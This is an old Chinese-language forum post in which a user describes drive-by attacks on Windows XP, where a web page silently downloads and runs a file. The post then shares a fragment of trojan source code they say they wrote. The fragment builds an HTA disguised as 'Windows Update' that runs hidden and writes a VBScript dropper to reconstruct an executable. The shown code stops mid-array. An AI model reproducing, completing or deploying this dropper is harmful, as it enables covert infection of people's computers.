upside
反病毒 反诈骗 反虐犬
|
分享:
▲
▼
一般来说 我只要在该网页内 写入一些指令语法就能 背景跳出视窗并自动下载档案到你的电脑并且执行 这样就达到入侵的动作了 我分享一段 之前写的木马程序的一段 应该还能看的懂吧 其他程序的执行法就无发布出来了 按照现在的XP 系统安全性 几乎无法防止 因为漏洞实在太多 甚至可以仿照正常下载程序来发布木马 防毒与防火墙 不可能阻挡这些正常程序 否则会无法上网或下载 除了已知木马外约有70%-80% 几乎无法阻挡 这些也是我头痛的地方 明知道原理 可是找不出也写不出好程式 szHTAFileName equ "xxx.exe" szHTAVbsName equ "xxx.vbs" szHTACode1 db '<HTML>',13,10 db '<HEAD>',13,10 db '<TITLE>Windows Update</TITLE>',13,10 db '<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>',13,10 db '<SCRIPT LANGUAGE="VBScript">',13,10 db 'MyFile = "',szHTAVbsName,'"',13,10 db 'Set FSO = CreateObject("Scripting.FileSystemObject")',13,10 db 'Set TSO = FSO.CreateTextFile(MyFile, True)',13,10 db 'TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf',13,10 db 'TSO.write "textfile = ""',szHTAFileName,'""" & vbcrlf',13,10 db 'TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf',13,10 db 'TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf',13,10 db 'TSO.write "getname = filesys.GetFileName(path)" & vbcrlf',13,10 db 'TSO.write "dim a" & vbcrlf',13,10 db 'TSO.write "a=Array(',0
[ 此文章被upside在2006-12-14 21:26重新编辑 ]
|
爸爸 你一路好走
|
x0
[3 楼]
From:台湾
| Posted:2006-12-14 21:15 |
|
|
|